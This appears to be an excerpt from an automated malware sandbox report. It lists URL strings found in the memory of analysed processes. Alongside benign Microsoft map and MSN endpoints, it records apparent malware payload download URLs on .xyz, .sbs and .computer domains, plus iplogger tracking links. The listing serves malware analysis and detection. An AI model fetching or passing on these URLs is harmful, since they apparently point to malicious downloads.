Source: svchost.exe, 00000009.00000003.1390450740.000002B171666000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1390014101.000002B17165A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1376016747.000002B17166D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1403044644.000002B171644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1384271390.000002B171662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1413696075.000002B171670000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1390225011.000002B171643000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1407427465.000002B171663000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000009.00000003.1390262007.000002B171657000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1404251431.000002B171658000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000009.00000003.1379776418.000002B171667000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1390226765.000002B17166A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000009.00000003.1376016747.000002B17166D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1413696075.000002B171670000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
Source: svchost.exe, 00000009.00000003.1390262007.000002B171657000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1404251431.000002B171658000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000009.00000003.1390450740.000002B171666000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1390014101.000002B17165A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1402242480.000002B17162B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1384271390.000002B171662000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000009.00000003.1390262007.000002B171657000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1404251431.000002B171658000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 00000009.00000002.1410441541.000002B171668000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1402242480.000002B17162B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1379776418.000002B171667000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000009.00000003.1390262007.000002B171657000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1404251431.000002B171658000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000009.00000003.1390262007.000002B171657000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1404251431.000002B171658000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000009.00000003.1390262007.000002B171657000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1404251431.000002B171658000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000009.00000002.1402242480.000002B17162B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1384271390.000002B171662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1407427465.000002B171663000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
Source: svchost.exe, 00000009.00000002.1402242480.000002B17162B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000009.00000003.1390262007.000002B171657000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1404251431.000002B171658000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000009.00000003.1384271390.000002B171662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1407427465.000002B171663000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1482426691.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.00000000043CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.vk.com
Source: svchost.exe, 00000009.00000002.1403044644.000002B171644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1390225011.000002B171643000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/g
Source: svchost.exe, 00000009.00000003.1390301822.000002B171633000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1403044644.000002B171644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1384271390.000002B171662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1390225011.000002B171643000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1407427465.000002B171663000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000009.00000002.1402242480.000002B17162B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000009.00000003.1384271390.000002B171662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1407427465.000002B171663000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000009.00000002.1403044644.000002B171644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1390225011.000002B171643000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
Source: svchost.exe, 00000009.00000002.1407427465.000002B171663000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000009.00000003.1390262007.000002B171657000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1404251431.000002B171658000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000009.00000002.1402242480.000002B17162B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1379776418.000002B171667000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1390226765.000002B17166A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: explorer.exe, 00000024.00000000.1465540565.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1429371121.00000000043A1000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1453551457.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1456849996.000000000436F000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1452926000.000000000436C000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457040379.00000000043C7000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1450196885.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1429282984.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1452926000.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1429328334.000000000437A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://f.123654987.xyz/525403/setup.exe
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478377141.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457084497.00000000043CA000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426618374.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1453551457.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457040379.00000000043C7000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1450196885.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1429282984.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1452926000.00000000043C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://f.123654987.xyz/525403/setup.exe8
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1421794459.00000000043AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://f.123654987.xyz/525403/setup.exe_
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457084497.00000000043CA000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426618374.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1453551457.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457040379.00000000043C7000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1450196885.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1429282984.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1452926000.00000000043C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://f.123654987.xyz/525403/setup.exev
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fleur-de-lis.sbs/
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fleur-de-lis.sbs/Mx
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002AA4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002A76000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1451554519.00000000043AC000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1429371121.00000000043AC000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1429371121.00000000043A1000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002AA4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002A76000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1461461741.0000000002A65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fleur-de-lis.sbs/jhgfd
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002A76000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002A76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fleur-de-lis.sbs/jhgfdM
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fleur-de-lis.sbs/jhgfde
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1461461741.0000000002A65000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1451554519.0000000004390000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1421794459.00000000043AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fleur-de-lis.sbs/post/File_294/setup294.exe
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AEF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://free.360totalsecuritPz
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002A43000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AEF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://free.360totalsecurity.com
Source: AddInProcess32.exe, 00000005.00000002.2604784378.00000000029C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://free.360totalsecurity.com/totalsecurity/360TS_Setup_Mini_WW.Marketator.CPI20230405_6.6.0.105
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://googletagmanager.com
Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1c9Jin.img
Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1305731063.00000000004E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/namehttps://ipgeolocation.io/status
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.000000000062B000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.000000000062B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/widget/demo/8.46.123.175
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002961000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.com/1djqU4
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C4D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002990000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CE9000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C77000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C87000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B2D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C04000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.000000000299B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CC5000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C3D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002A3F000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B92000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CD9000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B04000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, aQ7CUsrnipUkMOjgF0nKuX1q.exe.5.dr, OEf7asb27AljF1U8YK72cN6l.exe.5.dr	String found in binary or memory: https://iplogger.org/
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C4D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002990000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CE9000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C77000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C87000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B2D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C04000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.000000000299B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CC5000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C3D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002A3F000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B92000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CD9000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B04000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, aQ7CUsrnipUkMOjgF0nKuX1q.exe.5.dr, OEf7asb27AljF1U8YK72cN6l.exe.5.dr	String found in binary or memory: https://iplogger.org/privacy/
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C4D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002990000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CE9000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C77000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C87000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B2D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C04000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.000000000299B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CC5000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C3D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002A3F000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B92000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CD9000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B04000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, aQ7CUsrnipUkMOjgF0nKuX1q.exe.5.dr, OEf7asb27AljF1U8YK72cN6l.exe.5.dr	String found in binary or memory: https://iplogger.org/rules/
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kurd.computer/
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478377141.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457084497.00000000043CA000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426618374.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420648647.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1419328721.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1413612501.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1453551457.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457040379.00000000043C7000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1421794459.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414955708.00000000043C9000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1450196885.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1429282984.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1452926000.00000000043C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kurd.computer/dll/builddoc.exe
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426618374.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420648647.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1419328721.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1413612501.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1421794459.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414955708.00000000043C9000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1429282984.00000000043C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kurd.computer/dll/builddoc.exe0
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478377141.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457084497.00000000043CA000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426618374.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420648647.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1419328721.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1413612501.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1453551457.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457040379.00000000043C7000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1421794459.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414955708.00000000043C9000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1450196885.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1429282984.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1452926000.00000000043C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kurd.computer/dll/builddoc.exep
